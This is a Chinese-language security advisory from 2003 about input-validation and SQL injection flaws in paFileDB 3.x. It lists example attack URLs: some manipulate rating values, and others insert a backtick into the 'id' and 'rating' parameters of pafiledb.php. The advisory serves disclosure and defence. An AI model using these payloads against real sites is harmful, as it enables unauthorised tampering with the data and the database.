积极预防 及时发现
快速响应 力保恢复
paFileDB 3.x SQL 存在注入缺陷 (Other,缺陷)
发布时间:2003-03-27 信息来源:管理员

涉及程序: paFileDB 3.0 Final/3.0 Beta 3.1/3.1 Final 描述: paFileDB 3.x SQL 存在注入缺陷 详细: paFileDB是一种文件管理脚本,支持用户文件等级分类,并使用SQL数据库backend。由于对输入的变量缺乏正确的检查,paFileDB存在多个缺陷: —修改的“id”标签允许用户提交无限的等级分类 —手动编辑“rating”标签允许用户提交大于10或小于0的等级分类 —标签没有正确检查溢出字符,导致攻击者能进行SQL注入 使用任意简短字符串和脚本替换 : http://target/pafiledb/pafiledb.php?action=rate&id=1 &rate=dorate&rating=10 提交文件等级分类(从10到1000,如果为-1000,将出现相反等级分类): http://target/pafiledb/pafiledb.php?action=rate&id=1&rate=dorate&rating=1000 SQL注入攻击: http://target/pafiledb/pafiledb.php?action=rate&id=1&rate=dorate&rating=` http://target/pafiledb/pafiledb.php?action=rate&id=`&rate=dorate&rating=10 攻击方法: 示例代码1: http://target/pafiledb/pafiledb.php?action=rate&id=1 &rate=dorate&rating=10 示例代码2: http://target/pafiledb/pafiledb.php?action=rate&id=1&rate=dorate&rating=1000 示例代码3: http://target/pafiledb/pafiledb.php?action=rate&id=1&rate=dorate&rating=` http://target/pafiledb/pafiledb.php?action=rate&id=`&rate=dorate&rating=10 解决方案: 目前厂商未公布该缺陷补丁,请用户及时关注厂商站点: http://www.phparena.net/